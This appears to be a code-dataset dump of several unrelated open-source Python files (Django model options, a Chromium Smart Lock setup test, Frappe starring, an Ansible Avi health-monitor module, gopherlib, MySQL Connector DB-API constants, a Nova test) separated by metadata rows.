def contribute_to_class(self, cls, name):
from django.db import connection
from django.db.backends.util import truncate_name
cls._meta = self
self.installed = re.sub('\.models$', '', cls.__module__) in settings.INSTALLED_APPS
# First, construct the default values for these options.
self.object_name = cls.__name__
self.module_name = self.object_name.lower()
self.verbose_name = get_verbose_name(self.object_name)
# Next, apply any overridden values from 'class Meta'.
if self.meta:
meta_attrs = self.meta.__dict__.copy()
for name in self.meta.__dict__:
# Ignore any private attributes that Django doesn't care about.
# NOTE: We can't modify a dictionary's contents while looping
# over it, so we loop over the *original* dictionary instead.
if name.startswith('_'):
del meta_attrs[name]
for attr_name in DEFAULT_NAMES:
if attr_name in meta_attrs:
setattr(self, attr_name, meta_attrs.pop(attr_name))
elif hasattr(self.meta, attr_name):
setattr(self, attr_name, getattr(self.meta, attr_name))
# unique_together can be either a tuple of tuples, or a single
# tuple of two strings. Normalize it to a tuple of tuples, so that
# calling code can uniformly expect that.
ut = meta_attrs.pop('unique_together', getattr(self, 'unique_together'))
if ut and not isinstance(ut[0], (tuple, list)):
ut = (ut,)
setattr(self, 'unique_together', ut)
# verbose_name_plural is a special case because it uses a 's'
# by default.
if self.verbose_name_plural is None:
self.verbose_name_plural = string_concat(self.verbose_name, 's')
# Any leftover attributes must be invalid.
if meta_attrs != {}:
raise TypeError("'class Meta' got invalid attribute(s): %s" % ','.join(meta_attrs.keys()))
else:
self.verbose_name_plural = string_concat(self.verbose_name, 's')
del self.meta
# If the db_table wasn't provided, use the app_label + module_name.
if not self.db_table:
self.db_table = "%s_%s" % (self.app_label, self.module_name)
self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
def _prepare(self, model):
if self.order_with_respect_to:
self.order_with_respect_to = self.get_field(self.order_with_respect_to)
self.ordering = ('_order',)
model.add_to_class('_order', OrderWrt())
else:
self.order_with_respect_to = None
if self.pk is None:
if self.parents:
# Promote the first parent link in lieu of adding yet another
# field.
field = self.parents.value_for_index(0)
field.primary_key = True
self.setup_pk(field)
else:
auto = AutoField(verbose_name='ID', primary_key=True,
auto_created=True)
model.add_to_class('id', auto)
# Determine any sets of fields that are pointing to the same targets
# (e.g. two ForeignKeys to the same remote model). The query
# construction code needs to know this. At the end of this,
# self.duplicate_targets will map each duplicate field column to the
# columns it duplicates.
collections = {}
for column, target in self.duplicate_targets.iteritems():
try:
collections[target].add(column)
except KeyError:
collections[target] = set([column])
self.duplicate_targets = {}
for elt in collections.itervalues():
if len(elt) == 1:
continue
for column in elt:
self.duplicate_targets[column] = elt.difference(set([column]))
def add_field(self, field):
# Insert the given field in the order in which it was created, using
# the "creation_counter" attribute of the field.
# Move many-to-many related fields from self.fields into
# self.many_to_many.
if field.rel and isinstance(field.rel, ManyToManyRel):
self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)
if hasattr(self, '_m2m_cache'):
del self._m2m_cache
else:
self.local_fields.insert(bisect(self.local_fields, field), field)
self.setup_pk(field)
if hasattr(self, '_field_cache'):
del self._field_cache
del self._field_name_cache
if hasattr(self, '_name_map'):
del self._name_map
def add_virtual_field(self, field):
self.virtual_fields.append(field)
def setup_pk(self, field):
if not self.pk and field.primary_key:
self.pk = field
field.serialize = False
def setup_proxy(self, target):
"""
Does the internal setup so that the current model is a proxy for
"target".
"""
self.pk = target._meta.pk
self.proxy_for_model = target
self.db_table = target._meta.db_table
def __repr__(self):
return '<Options for %s>' % self.object_name
def __str__(self):
return "%s.%s" % (smart_str(self.app_label), smart_str(self.module_name))
def verbose_name_raw(self):
"""
There are a few places where the untranslated verbose name is needed
(so that we get the same value regardless of currently active
locale).
"""
lang = get_language()
deactivate_all()
raw = force_unicode(self.verbose_name)
activate(lang)
return raw
verbose_name_raw = property(verbose_name_raw)
def _fields(self):
"""
The getter for self.fields. This returns the list of field objects
available to this model (including through parent models).
Callers are not permitted to modify this list, since it's a reference
to this instance (not a copy).
"""
try:
self._field_name_cache
except AttributeError:
self._fill_fields_cache()
return self._field_name_cache
fields = property(_fields)
def get_fields_with_model(self):
"""
Returns a sequence of (field, model) pairs for all fields. The "model"
element is None for fields on the current model. Mostly of use when
constructing queries so that we know which model a field belongs to.
"""
try:
self._field_cache
except AttributeError:
self._fill_fields_cache()
return self._field_cache
def _fill_fields_cache(self):
cache = []
for parent in self.parents:
for field, model in parent._meta.get_fields_with_model():
if model:
cache.append((field, model))
else:
cache.append((field, parent))
cache.extend([(f, None) for f in self.local_fields])
self._field_cache = tuple(cache)
self._field_name_cache = [x for x, _ in cache]
def _many_to_many(self):
try:
self._m2m_cache
except AttributeError:
self._fill_m2m_cache()
return self._m2m_cache.keys()
many_to_many = property(_many_to_many)
def get_m2m_with_model(self):
"""
The many-to-many version of get_fields_with_model().
"""
try:
self._m2m_cache
except AttributeError:
self._fill_m2m_cache()
return self._m2m_cache.items()
def _fill_m2m_cache(self):
cache = SortedDict()
for parent in self.parents:
for field, model in parent._meta.get_m2m_with_model():
if model:
cache[field] = model
else:
cache[field] = parent
for field in self.local_many_to_many:
cache[field] = None
self._m2m_cache = cache
def get_field(self, name, many_to_many=True):
"""
Returns the requested field by name. Raises FieldDoesNotExist on error.
"""
to_search = many_to_many and (self.fields + self.many_to_many) or self.fields
for f in to_search:
if f.name == name:
return f
raise FieldDoesNotExist('%s has no field named %r' % (self.object_name, name))
def get_field_by_name(self, name):
"""
Returns the (field_object, model, direct, m2m), where field_object is
the Field instance for the given name, model is the model containing
this field (None for local fields), direct is True if the field exists
on this model, and m2m is True for many-to-many relations. When
'direct' is False, 'field_object' is the corresponding RelatedObject
for this field (since the field doesn't have an instance associated
with it).
Uses a cache internally, so after the first access, this is very fast.
"""
try:
try:
return self._name_map[name]
except AttributeError:
cache = self.init_name_map()
return cache[name]
except KeyError:
raise FieldDoesNotExist('%s has no field named %r'
% (self.object_name, name))
def get_all_field_names(self):
"""
Returns a list of all field names that are possible for this model
(including reverse relation names). This is used for pretty printing
debugging output (a list of choices), so any internal-only field names
are not included.
"""
try:
cache = self._name_map
except AttributeError:
cache = self.init_name_map()
names = cache.keys()
names.sort()
# Internal-only names end with "+" (symmetrical m2m related names being
# the main example). Trim them.
return [val for val in names if not val.endswith('+')]
def init_name_map(self):
"""
Initialises the field name -> field object mapping.
"""
cache = {}
# We intentionally handle related m2m objects first so that symmetrical
# m2m accessor names can be overridden, if necessary.
for f, model in self.get_all_related_m2m_objects_with_model():
cache[f.field.related_query_name()] = (f, model, False, True)
for f, model in self.get_all_related_objects_with_model():
cache[f.field.related_query_name()] = (f, model, False, False)
for f, model in self.get_m2m_with_model():
cache[f.name] = (f, model, True, True)
for f, model in self.get_fields_with_model():
cache[f.name] = (f, model, True, False)
if app_cache_ready():
self._name_map = cache
return cache
def get_add_permission(self):
return 'add_%s' % self.object_name.lower()
def get_change_permission(self):
return 'change_%s' % self.object_name.lower()
def get_delete_permission(self):
return 'delete_%s' % self.object_name.lower()
def get_all_related_objects(self, local_only=False):
try:
self._related_objects_cache
except AttributeError:
self._fill_related_objects_cache()
if local_only:
return [k for k, v in self._related_objects_cache.items() if not v]
return self._related_objects_cache.keys()
def get_all_related_objects_with_model(self):
"""
Returns a list of (related-object, model) pairs. Similar to
get_fields_with_model().
"""
try:
self._related_objects_cache
except AttributeError:
self._fill_related_objects_cache()
return self._related_objects_cache.items()
def _fill_related_objects_cache(self):
cache = SortedDict()
parent_list = self.get_parent_list()
for parent in self.parents:
for obj, model in parent._meta.get_all_related_objects_with_model():
if (obj.field.creation_counter < 0 or obj.field.rel.parent_link) and obj.model not in parent_list:
continue
if not model:
cache[obj] = parent
else:
cache[obj] = model
for klass in get_models():
for f in klass._meta.local_fields:
if f.rel and not isinstance(f.rel.to, str) and self == f.rel.to._meta:
cache[RelatedObject(f.rel.to, klass, f)] = None
self._related_objects_cache = cache
def get_all_related_many_to_many_objects(self, local_only=False):
try:
cache = self._related_many_to_many_cache
except AttributeError:
cache = self._fill_related_many_to_many_cache()
if local_only:
return [k for k, v in cache.items() if not v]
return cache.keys()
def get_all_related_m2m_objects_with_model(self):
"""
Returns a list of (related-m2m-object, model) pairs. Similar to
get_fields_with_model().
"""
try:
cache = self._related_many_to_many_cache
except AttributeError:
cache = self._fill_related_many_to_many_cache()
return cache.items()
def _fill_related_many_to_many_cache(self):
cache = SortedDict()
parent_list = self.get_parent_list()
for parent in self.parents:
for obj, model in parent._meta.get_all_related_m2m_objects_with_model():
if obj.field.creation_counter < 0 and obj.model not in parent_list:
continue
if not model:
cache[obj] = parent
else:
cache[obj] = model
for klass in get_models():
for f in klass._meta.local_many_to_many:
if f.rel and not isinstance(f.rel.to, str) and self == f.rel.to._meta:
cache[RelatedObject(f.rel.to, klass, f)] = None
if app_cache_ready():
self._related_many_to_many_cache = cache
return cache
def get_base_chain(self, model):
"""
        Returns a list of parent classes leading to 'model' (ordered from closest
        to most distant ancestor). This has to handle the case where 'model' is
        a grandparent or even more distant relation.
"""
if not self.parents:
return
if model in self.parents:
return [model]
for parent in self.parents:
res = parent._meta.get_base_chain(model)
if res:
res.insert(0, parent)
return res
raise TypeError('%r is not an ancestor of this model'
% model._meta.module_name)
def get_parent_list(self):
"""
        Returns a set of all the ancestors of this model. Useful for
determining if something is an ancestor, regardless of lineage.
"""
result = set()
for parent in self.parents:
result.add(parent)
result.update(parent._meta.get_parent_list())
return result
def get_ancestor_link(self, ancestor):
"""
Returns the field on the current model which points to the given
"ancestor". This is possible an indirect link (a pointer to a parent
model, which points, eventually, to the ancestor). Used when
constructing table joins for model inheritance.
Returns None if the model isn't an ancestor of this one.
"""
if ancestor in self.parents:
return self.parents[ancestor]
for parent in self.parents:
# Tries to get a link field from the immediate parent
parent_link = parent._meta.get_ancestor_link(ancestor)
if parent_link:
                # In the case of a proxied model, the first link in the chain
                # to the ancestor is the link to that parent.
return self.parents[parent] or parent_link
def get_ordered_objects(self):
"Returns a list of Options objects that are ordered with respect to this object."
if not hasattr(self, '_ordered_objects'):
objects = []
# TODO
#for klass in get_models(get_app(self.app_label)):
# opts = klass._meta
# if opts.order_with_respect_to and opts.order_with_respect_to.rel \
# and self == opts.order_with_respect_to.rel.to._meta:
# objects.append(opts)
self._ordered_objects = objects
return self._ordered_objects
def pk_index(self):
"""
Returns the index of the primary key field in the self.fields list.
"""
return self.fields.index(self.pk)
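# Illustrative access pattern (not part of this module; the model name below is
# hypothetical). An Options instance is normally reached through a model's
# ``_meta`` attribute:
#
#   opts = BlogPost._meta
#   opts.get_field('title')        # Field instance for the 'title' column
#   opts.get_all_field_names()     # sorted, queryable field names
#   opts.pk_index()                # position of the primary key in opts.fields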
| gpl-3.0 | 5,512,299,899,066,825,000 | 39.047035 | 122 | 0.580759 | false |
darktears/chromium-crosswalk | components/proximity_auth/e2e_test/setup_test.py | 28 | 5738 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Script that exercises the Smart Lock setup flow, testing that a nearby phone
can be found and used to unlock a Chromebook.
Note: This script does not currently automate Android phones, so make sure that
a phone is properly configured and online before starting the test.
Usage:
python setup_test.py --remote_address REMOTE_ADDRESS
--username USERNAME
--password PASSWORD
[--app_path APP_PATH]
[--ssh_port SSH_PORT]
[--cryptauth_staging_url STAGING_URL]
If |--app_path| is provided, then a copy of the Smart Lock app on the local
machine will be used instead of the app on the ChromeOS device.
"""
import argparse
import cros
import cryptauth
import logging
import os
import subprocess
import sys
import tempfile
logger = logging.getLogger('proximity_auth.%s' % __name__)
class SmartLockSetupError(Exception):
pass
def pingable_address(address):
try:
subprocess.check_output(['ping', '-c', '1', '-W', '1', address])
except subprocess.CalledProcessError:
    raise argparse.ArgumentTypeError('%s cannot be reached.' % address)
return address
def email(arg):
tokens = arg.lower().split('@')
if len(tokens) != 2 or '.' not in tokens[1]:
    raise argparse.ArgumentTypeError('%s is not a valid email address' % arg)
name, domain = tokens
if domain == 'gmail.com':
name = name.replace('.', '')
return '@'.join([name, domain])
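# For instance (illustrative): email('[email protected]') returns
# '[email protected]', since dots in a gmail local part are not significant.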
def directory(path):
if not os.path.isdir(path):
    raise argparse.ArgumentTypeError('%s is not a directory' % path)
return path
def ParseArgs():
parser = argparse.ArgumentParser(prog='python setup_test.py')
parser.add_argument('--remote_address', required=True, type=pingable_address)
parser.add_argument('--username', required=True, type=email)
parser.add_argument('--password', required=True)
parser.add_argument('--ssh_port', type=int)
parser.add_argument('--app_path', type=directory)
parser.add_argument('--cryptauth_staging_url', type=str)
args = parser.parse_args()
return args
def CheckCryptAuthState(access_token):
cryptauth_client = cryptauth.CryptAuthClient(access_token)
# Check if we can make CryptAuth requests.
if cryptauth_client.GetMyDevices() is None:
logger.error('Cannot reach CryptAuth on test machine.')
return False
if cryptauth_client.GetUnlockKey() is not None:
logger.info('Smart Lock currently enabled, turning off on Cryptauth...')
if not cryptauth_client.ToggleEasyUnlock(False):
logger.error('ToggleEasyUnlock request failed.')
return False
result = cryptauth_client.FindEligibleUnlockDevices()
if result is None:
logger.error('FindEligibleUnlockDevices request failed')
return False
eligibleDevices, _ = result
if len(eligibleDevices) == 0:
logger.warn('No eligible phones found, trying to ping phones...')
result = cryptauth_client.PingPhones()
if result is None or not len(result[0]):
logger.error('Pinging phones failed :(')
return False
else:
logger.info('Pinging phones succeeded!')
else:
logger.info('Found eligible device: %s' % (
eligibleDevices[0]['friendlyDeviceName']))
return True
def _NavigateSetupDialog(chromeos, app):
logger.info('Scanning for nearby phones...')
btmon = chromeos.RunBtmon()
find_phone_success = app.FindPhone()
btmon.terminate()
if not find_phone_success:
fd, filepath = tempfile.mkstemp(prefix='btmon-')
os.write(fd, btmon.stdout.read())
os.close(fd)
logger.info('Logs for btmon can be found at %s' % filepath)
raise SmartLockSetupError("Failed to find nearby phone.")
logger.info('Phone found! Starting pairing...')
if not app.PairPhone():
raise SmartLockSetupError("Failed to pair with phone.")
logger.info('Pairing success! Starting trial run...')
app.StartTrialRun()
logger.info('Unlocking for trial run...')
lock_screen = chromeos.GetAccountPickerScreen()
lock_screen.WaitForSmartLockState(
lock_screen.SmartLockState.AUTHENTICATED)
lock_screen.UnlockWithClick()
logger.info('Trial run success! Dismissing app...')
app.DismissApp()
def RunSetupTest(args):
logger.info('Starting test for %s at %s' % (
args.username, args.remote_address))
if args.app_path is not None:
logger.info('Replacing Smart Lock app with %s' % args.app_path)
chromeos = cros.ChromeOS(
args.remote_address, args.username, args.password, ssh_port=args.ssh_port)
with chromeos.Start(local_app_path=args.app_path):
logger.info('Chrome initialized')
# TODO(tengs): The access token is currently fetched from the Smart Lock
# app's background page. To be more robust, we should instead mint the
# access token ourselves.
if not CheckCryptAuthState(chromeos.cryptauth_access_token):
raise SmartLockSetupError('Failed to check CryptAuth state')
logger.info('Opening Smart Lock settings...')
settings = chromeos.GetSmartLockSettings()
assert(not settings.is_smart_lock_enabled)
if args.cryptauth_staging_url is not None:
chromeos.SetCryptAuthStaging(args.cryptauth_staging_url)
logger.info('Starting Smart Lock setup flow...')
app = settings.StartSetupAndReturnApp()
if app is None:
raise SmartLockSetupError('Failed to obtain set up app window')
_NavigateSetupDialog(chromeos, app)
def main():
logging.basicConfig()
logging.getLogger('proximity_auth').setLevel(logging.INFO)
args = ParseArgs()
RunSetupTest(args)
if __name__ == '__main__':
main()
| bsd-3-clause | 3,833,290,620,455,111,700 | 33.359281 | 80 | 0.70129 | false |
nerevu/frappe | frappe/desk/star.py | 38 | 1503 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""Allow adding of stars to documents"""
import frappe, json
from frappe.model.db_schema import add_column
@frappe.whitelist()
def toggle_star(doctype, name, add=False):
"""Adds / removes the current user in the `__starred_by` property of the given document.
If column does not exist, will add it in the database.
The `_starred_by` property is always set from this function and is ignored if set via
Document API
:param doctype: DocType of the document to star
:param name: Name of the document to star
:param add: `Yes` if star is to be added. If not `Yes` the star will be removed."""
_toggle_star(doctype, name, add)
def _toggle_star(doctype, name, add=False, user=None):
"""Same as toggle_star but hides param `user` from API"""
if not user:
user = frappe.session.user
try:
starred_by = frappe.db.get_value(doctype, name, "_starred_by")
if starred_by:
starred_by = json.loads(starred_by)
else:
starred_by = []
if add=="Yes":
if user not in starred_by:
starred_by.append(user)
else:
if user in starred_by:
starred_by.remove(user)
frappe.db.sql("""update `tab{0}` set `_starred_by`=%s where name=%s""".format(doctype),
(json.dumps(starred_by), name))
except Exception, e:
if e.args[0]==1054:
add_column(doctype, "_starred_by", "Text")
_toggle_star(doctype, name, add, user)
else:
raise
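# Illustrative call (the doctype and document name below are hypothetical):
#
#   _toggle_star("Task", "TASK-00001", add="Yes", user="[email protected]")
#
# appends the user to the document's `_starred_by` JSON list; calling it again
# with add != "Yes" removes the user.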
| mit | -17,695,761,688,688,134 | 27.358491 | 89 | 0.692615 | false |
robinro/ansible | lib/ansible/modules/network/avi/avi_healthmonitor.py | 43 | 6595 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 17.1.1
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_healthmonitor
author: Gaurav Rastogi ([email protected])
short_description: Module for setup of HealthMonitor Avi RESTful Object
description:
- This module is used to configure HealthMonitor object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
description:
description:
- User defined description for the object.
dns_monitor:
description:
- Healthmonitordns settings for healthmonitor.
external_monitor:
description:
- Healthmonitorexternal settings for healthmonitor.
failed_checks:
description:
- Number of continuous failed health checks before the server is marked down.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
http_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
https_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
monitor_port:
description:
- Use this port instead of the port defined for the server in the pool.
- If the monitor succeeds to this port, the load balanced traffic will still be sent to the port of the server defined within the pool.
- Allowed values are 1-65535.
- Special values are 0 - 'use server port'.
name:
description:
- A user friendly name for this health monitor.
required: true
receive_timeout:
description:
- A valid response from the server is expected within the receive timeout window.
- This timeout must be less than the send interval.
- If server status is regularly flapping up and down, consider increasing this value.
- Allowed values are 1-300.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
send_interval:
description:
- Frequency, in seconds, that monitors are sent to a server.
- Allowed values are 1-3600.
- Default value when not specified in API or module is interpreted by Avi Controller as 10.
successful_checks:
description:
- Number of continuous successful health checks before server is marked up.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
tcp_monitor:
description:
- Healthmonitortcp settings for healthmonitor.
tenant_ref:
description:
- It is a reference to an object of type tenant.
type:
description:
- Type of the health monitor.
- Enum options - HEALTH_MONITOR_PING, HEALTH_MONITOR_TCP, HEALTH_MONITOR_HTTP, HEALTH_MONITOR_HTTPS, HEALTH_MONITOR_EXTERNAL, HEALTH_MONITOR_UDP,
- HEALTH_MONITOR_DNS, HEALTH_MONITOR_GSLB.
required: true
udp_monitor:
description:
- Healthmonitorudp settings for healthmonitor.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the health monitor.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create a HTTPS health monitor
avi_healthmonitor:
controller: 10.10.27.90
username: admin
password: AviNetworks123!
https_monitor:
http_request: HEAD / HTTP/1.0
http_response_code:
- HTTP_2XX
- HTTP_3XX
receive_timeout: 4
failed_checks: 3
send_interval: 10
successful_checks: 3
type: HEALTH_MONITOR_HTTPS
name: MyWebsite-HTTPS
'''
RETURN = '''
obj:
description: HealthMonitor (api/healthmonitor) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
description=dict(type='str',),
dns_monitor=dict(type='dict',),
external_monitor=dict(type='dict',),
failed_checks=dict(type='int',),
http_monitor=dict(type='dict',),
https_monitor=dict(type='dict',),
monitor_port=dict(type='int',),
name=dict(type='str', required=True),
receive_timeout=dict(type='int',),
send_interval=dict(type='int',),
successful_checks=dict(type='int',),
tcp_monitor=dict(type='dict',),
tenant_ref=dict(type='str',),
type=dict(type='str', required=True),
udp_monitor=dict(type='dict',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'healthmonitor',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 | -3,460,733,175,874,149,000 | 34.456989 | 157 | 0.638817 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-2.0/Lib/gopherlib.py | 8 | 5634 | """Gopher protocol client interface."""
import string
# Default selector, host and port
DEF_SELECTOR = '1/'
DEF_HOST = 'gopher.micro.umn.edu'
DEF_PORT = 70
# Recognized file types
A_TEXT = '0'
A_MENU = '1'
A_CSO = '2'
A_ERROR = '3'
A_MACBINHEX = '4'
A_PCBINHEX = '5'
A_UUENCODED = '6'
A_INDEX = '7'
A_TELNET = '8'
A_BINARY = '9'
A_DUPLICATE = '+'
A_SOUND = 's'
A_EVENT = 'e'
A_CALENDAR = 'c'
A_HTML = 'h'
A_TN3270 = 'T'
A_MIME = 'M'
A_IMAGE = 'I'
A_WHOIS = 'w'
A_QUERY = 'q'
A_GIF = 'g'
A_HTML = 'h' # HTML file
A_WWW = 'w' # WWW address
A_PLUS_IMAGE = ':'
A_PLUS_MOVIE = ';'
A_PLUS_SOUND = '<'
_names = dir()
_type_to_name_map = {}
def type_to_name(gtype):
"""Map all file types to strings; unknown types become TYPE='x'."""
global _type_to_name_map
if _type_to_name_map=={}:
for name in _names:
if name[:2] == 'A_':
_type_to_name_map[eval(name)] = name[2:]
if _type_to_name_map.has_key(gtype):
return _type_to_name_map[gtype]
return 'TYPE=' + `gtype`
# Names for characters and strings
CRLF = '\r\n'
TAB = '\t'
def send_selector(selector, host, port = 0):
"""Send a selector to a given host and port, return a file with the reply."""
import socket
import string
if not port:
i = string.find(host, ':')
if i >= 0:
host, port = host[:i], string.atoi(host[i+1:])
if not port:
port = DEF_PORT
elif type(port) == type(''):
port = string.atoi(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(selector + CRLF)
s.shutdown(1)
return s.makefile('rb')
def send_query(selector, query, host, port = 0):
"""Send a selector and a query string."""
return send_selector(selector + '\t' + query, host, port)
def path_to_selector(path):
"""Takes a path as returned by urlparse and returns the appropriate selector."""
if path=="/":
return "/"
else:
return path[2:] # Cuts initial slash and data type identifier
def path_to_datatype_name(path):
"""Takes a path as returned by urlparse and maps it to a string.
See section 3.4 of RFC 1738 for details."""
if path=="/":
# No way to tell, although "INDEX" is likely
return "TYPE='unknown'"
else:
return type_to_name(path[1])
# The following functions interpret the data returned by the gopher
# server according to the expected type, e.g. textfile or directory
def get_directory(f):
"""Get a directory in the form of a list of entries."""
import string
list = []
while 1:
line = f.readline()
if not line:
print '(Unexpected EOF from server)'
break
if line[-2:] == CRLF:
line = line[:-2]
elif line[-1:] in CRLF:
line = line[:-1]
if line == '.':
break
if not line:
print '(Empty line from server)'
continue
gtype = line[0]
parts = string.splitfields(line[1:], TAB)
if len(parts) < 4:
print '(Bad line from server:', `line`, ')'
continue
if len(parts) > 4:
if parts[4:] != ['+']:
print '(Extra info from server:',
print parts[4:], ')'
else:
parts.append('')
parts.insert(0, gtype)
list.append(parts)
return list
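# Illustrative use (requires a reachable gopher server; DEF_HOST is the module
# default and may no longer exist):
#
#   f = send_selector(DEF_SELECTOR, DEF_HOST)
#   for entry in get_directory(f):
#       print entry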
def get_textfile(f):
"""Get a text file as a list of lines, with trailing CRLF stripped."""
list = []
get_alt_textfile(f, list.append)
return list
def get_alt_textfile(f, func):
"""Get a text file and pass each line to a function, with trailing CRLF stripped."""
while 1:
line = f.readline()
if not line:
print '(Unexpected EOF from server)'
break
if line[-2:] == CRLF:
line = line[:-2]
elif line[-1:] in CRLF:
line = line[:-1]
if line == '.':
break
if line[:2] == '..':
line = line[1:]
func(line)
def get_binary(f):
"""Get a binary file as one solid data block."""
data = f.read()
return data
def get_alt_binary(f, func, blocksize):
"""Get a binary file and pass each block to a function."""
while 1:
data = f.read(blocksize)
if not data:
break
func(data)
def test():
"""Trivial test program."""
import sys
import getopt
opts, args = getopt.getopt(sys.argv[1:], '')
selector = DEF_SELECTOR
type = selector[0]
host = DEF_HOST
port = DEF_PORT
if args:
host = args[0]
args = args[1:]
if args:
type = args[0]
args = args[1:]
if len(type) > 1:
type, selector = type[0], type
else:
selector = ''
if args:
selector = args[0]
args = args[1:]
query = ''
if args:
query = args[0]
args = args[1:]
if type == A_INDEX:
f = send_query(selector, query, host)
else:
f = send_selector(selector, host)
if type == A_TEXT:
list = get_textfile(f)
for item in list: print item
elif type in (A_MENU, A_INDEX):
list = get_directory(f)
for item in list: print item
else:
data = get_binary(f)
print 'binary data:', len(data), 'bytes:', `data[:100]`[:40]
# Run the test when run as script
if __name__ == '__main__':
test()
| mit | 8,951,770,436,714,671,000 | 26.086538 | 88 | 0.526092 | false |
rupace10/mysql-connector-python | lib/mysql/connector/dbapi.py | 35 | 2330 | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2009, 2014, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
This module implements some constructors and singletons as required by the
DB API v2.0 (PEP-249).
"""
# Python Db API v2
apilevel = '2.0'
threadsafety = 1
paramstyle = 'pyformat'
import time
import datetime
from . import constants
class _DBAPITypeObject(object):
def __init__(self, *values):
self.values = values
def __eq__(self, other):
if other in self.values:
return True
else:
return False
def __ne__(self, other):
if other in self.values:
return False
else:
return True
Date = datetime.date
Time = datetime.time
Timestamp = datetime.datetime
def DateFromTicks(ticks):
return Date(*time.localtime(ticks)[:3])
def TimeFromTicks(ticks):
return Time(*time.localtime(ticks)[3:6])
def TimestampFromTicks(ticks):
return Timestamp(*time.localtime(ticks)[:6])
Binary = bytes
STRING = _DBAPITypeObject(*constants.FieldType.get_string_types())
BINARY = _DBAPITypeObject(*constants.FieldType.get_binary_types())
NUMBER = _DBAPITypeObject(*constants.FieldType.get_number_types())
DATETIME = _DBAPITypeObject(*constants.FieldType.get_timestamp_types())
ROWID = _DBAPITypeObject()
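# Illustration (comments only): the singletons above compare equal to any of
# the MySQL field-type codes they wrap, and the constructors return standard
# library types. Results of the *FromTicks helpers depend on the local timezone.
#
#   Date(2014, 7, 1)          # datetime.date(2014, 7, 1)
#   TimestampFromTicks(0)     # datetime.datetime close to the Unix epoch
#   Binary(b'\x00\x01')       # bytes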
| gpl-2.0 | 8,646,486,502,092,094,000 | 30.066667 | 78 | 0.722747 | false |
tanglei528/nova | nova/tests/integrated/v3/test_server_usage.py | 31 | 1463 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.integrated.v3 import test_servers
class ServerUsageSampleJsonTest(test_servers.ServersSampleBase):
extension_name = 'os-server-usage'
def setUp(self):
"""setUp method for server usage."""
super(ServerUsageSampleJsonTest, self).setUp()
self.uuid = self._post_server()
def test_show(self):
response = self._do_get('servers/%s' % self.uuid)
subs = self._get_regexes()
subs['id'] = self.uuid
subs['hostid'] = '[a-f0-9]+'
self._verify_response('server-get-resp', subs, response, 200)
def test_details(self):
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['id'] = self.uuid
subs['hostid'] = '[a-f0-9]+'
self._verify_response('servers-detail-resp', subs, response, 200)
| apache-2.0 | -7,752,620,562,111,676,000 | 36.512821 | 78 | 0.660287 | false |
cloudnull/ansible-modules-core | cloud/openstack/os_auth.py | 9 | 2006 | #!/usr/bin/python
